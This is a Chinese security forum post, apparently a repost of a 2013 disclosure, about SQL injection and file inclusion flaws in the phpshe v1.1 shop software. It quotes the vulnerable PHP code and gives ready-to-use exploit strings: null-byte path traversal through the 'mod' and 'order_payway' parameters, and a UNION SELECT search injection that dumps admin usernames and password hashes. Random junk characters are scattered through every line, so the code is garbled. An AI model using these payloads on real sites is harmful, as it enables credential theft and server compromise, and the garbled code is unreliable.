找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2198|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/7 K$ w- v& Z' \/ P9 M8 h  \
/* Phpshe v1.1 Vulnerability
! u/ G5 A+ d+ [$ o, ]: Q/* ========================
- n& w; _# Q( e* s3 X( p/* By: : Kn1f39 s3 P4 R; k7 o/ V- h" _
/* E-Mail : 681796@qq.com
& j; O$ I& n. q( J) [" l7 n/*******************************************************/* N: d5 L9 Y) y5 s1 z! D* V
0×00 整体大概参数传输
' U4 u1 M/ J8 a1 }% ` 2 t2 F' z) J$ G" ^
5 ~3 g4 P1 x/ e+ h; P) g

) ]' R/ G" K; K/ ~" B3 [& u//common.php/ L, x# V2 o' u* o
if (get_magic_quotes_gpc()) {
) E- m- E8 n% X" d0 r, _- e! ]1 R* b!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
: `' `+ U. H- H( t+ J5 H/ \!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
2 p: O% ?# y/ b% B% Q& T}
1 Z7 d" j5 {1 X# f3 l6 Pelse {/ n. ~5 h& r/ W% b" ?1 k$ T3 f! r
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');* f, Y% a& ?& ~. ^9 Z
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');8 u+ F0 D9 ]" v( t0 x. y
}
. G& n. M0 t3 ]  E# J! ssession_start();
" L9 N/ }- F+ f! }9 A; c!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');6 N, ?$ x/ I" z! ~8 q
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
/ A' K1 z3 w& K" o. u; h$ c4 Q# K  I* c9 k0 u
0×01 包含漏洞
/ ^6 {1 p( F+ \% w ) v2 U& {2 S0 {  V. i5 h+ p7 [

0 S% L4 n; s6 b5 _' O& V//首页文件! F' j& Z. U+ p1 i
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);. d& r4 @4 V$ b) ]7 V1 I( R
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
. d: T2 r$ p  Z  W; y# ^* T/ Ipe_result();3 D* W# U' e2 S4 Q- j
?>
$ d4 G' q6 B' c& [# ~; o//common 文件 第15行开始" e" P4 K' v8 ~5 ?& X
url路由配置3 B0 b/ |& g3 z( g
$module = $mod = $act = 'index';: `& P3 s5 C6 C( k3 U
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
, ]0 j# v+ G) _9 {' G# x. J0 ~$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);( C5 l: D  C( U, n
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);; v+ ^  w8 E, W* j' E% K
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
5 E# A/ D# j4 z" b, S9 ?

! j  f$ H4 Y6 T" p0 s

1 E+ l1 T( [3 R- c  X! k 0×02 搜索注入0 ^* g/ n. `, V9 u1 D' R
& _/ [) ]( _9 C8 W6 D/ _
<code id="code2">

//product.php文件/ F- f  t* \% p. _5 f' j$ a" u; @
case 'list':
" s7 X* H4 g8 T& v$category_id = intval($id);
5 c& Y" r5 E( @$info = $db->pe_select('category', array('category_id'=>$category_id));8 i1 B9 S6 d' O% K0 O+ L# H+ z
//搜索
# K, e' Z4 {# r% ?+ V# v, c$sqlwhere = " and `product_state` = 1";
: E' x0 t% T: J& h2 @pe_lead('hook/category.hook.php');
  g( p/ ^9 k4 q' u0 cif ($category_id) {
, j" \* M9 D5 G! x- Y1 f( a" A. Ywhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";& o8 C  ^. a9 _% u/ C& D
}
- S8 j2 I" g* D+ `# z5 [; O  ^9 g$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤" o3 L; O1 O3 w6 {
if ($_g_orderby) {5 ~* y5 U" m! T& w9 F% n
$orderby = explode('_', $_g_orderby);
6 d" @. t; g7 `$ K6 s( r$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";" L/ s- ]& L. G. G! z/ A; ~: T, I
}0 s' |, P5 ]+ t2 Z# K
else {
* I+ ]7 v& O: t8 S5 y' a( |8 i$sqlwhere .= " order by `product_id` desc";, p8 ^+ x; `& c; g* _* T
}; s5 x0 `; H- o% I) ~+ V9 ?
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
* @! ~0 [4 t0 D/ z# z8 o2 q7 P' [$ c1 |//热卖排行3 }9 U% o7 g& M$ k
$product_hotlist = product_hotlist();6 _1 @7 m2 }7 ]; }4 K' r4 [; O
//当前路径; [. }+ M2 b8 \) N- k8 l
$nowpath = category_path($category_id);
/ O$ ?! f( Q$ F4 N5 c( ]* v! H9 a$seo = pe_seo($info['category_name']);/ k6 ~3 T( [- N
include(pe_tpl('product_list.html'));# |4 a" z- V+ x
//跟进selectall函数库
4 H: b& I' B* s$ [public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())/ |! n& g2 ^. e1 y2 S: }7 w0 a
{
$ L& x0 l" Y# w. a# ~$ ]//处理条件语句
" k# z2 i. o- G4 c$sqlwhere = $this->_dowhere($where);
) p1 p- x6 W3 N$ d  J* x$ t# v( oreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
( F, d0 A. d5 R9 `- [; B0 u}  a4 N: k, j. H! `- n
//exp
# ~# _  {$ A- V# ~1 N9 w1 vproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1/ z4 U5 m' k# @5 q( M7 t5 p

</code>
6 ]- Q/ m% \$ R' @. I+ E ; H8 ^. u  @" Z. ]) [
0×03 包含漏洞2
: Z' j$ D- q) `
$ \5 o! b) I- {* ^; v+ P<code id="code3">

//order.php

case 'pay':

. |( N! t; j' o9 t
$order_id = pe_dbhold($_g_id);


! h* X7 o9 c. D, x5 b$cache_payway = cache::get('payway');

+ s4 \$ t9 q, x7 X9 [' S7 r. u
foreach($cache_payway as $k => $v) {


# k( n# ?# b8 J  c1 k! g$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


4 v5 J) l. A; Y& Uif ($k == 'bank') {


6 f. i6 `6 n/ w+ {6 \9 R5 Y$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


, B4 S  U2 M$ {0 F/ `, I}


1 O" z+ y+ X, O, Z! ?}


! s  K! f6 j4 S1 \* V$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


& \! K- W% n# Y; T; D! J1 K( @!$order['order_id'] && pe_error('订单号错误...');

& t. {4 s# L. y/ _
if (isset($_p_pesubmit)) {

; \, N0 U' x) M7 z0 w: H
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


% o3 W$ L  W  n# W' y$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


  B# f7 l& Z7 i- e; ^foreach ($info_list as $v) {

' [1 R+ Q0 B& c
$order['order_name'] .= "{$v['product_name']};";7 S- t% }) ~3 o+ u


3 t' F5 l& N/ d) G}

# N+ Q- N: e3 C; l) Z9 y- m
echo '正在为您连接支付网站,请稍后...';

: b9 `: D4 R- j. w9 K
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

& E$ I, s' t% Y8 R3 `, A
}//当一切准备好的时候就可以进行"鸡肋包含了"

, U7 N. O0 Q* S8 B' S7 M3 b, g4 E
else {

8 S3 n. z$ w' T, l2 E, Q& Q0 W
pe_error('支付错误...');

4 ^, y& N7 R; o- {; C7 X
}


+ A* @$ i/ c+ C0 Z* A}

8 s' }5 z. x1 n  x& K5 t1 E2 K
$seo = pe_seo('选择支付方式');

% G. j$ r8 ?2 y
include(pe_tpl('order_pay.html'));

% ~6 [* g3 b3 o/ h+ Q
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
/ A0 b! U3 }; b9 i7 A9 |http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表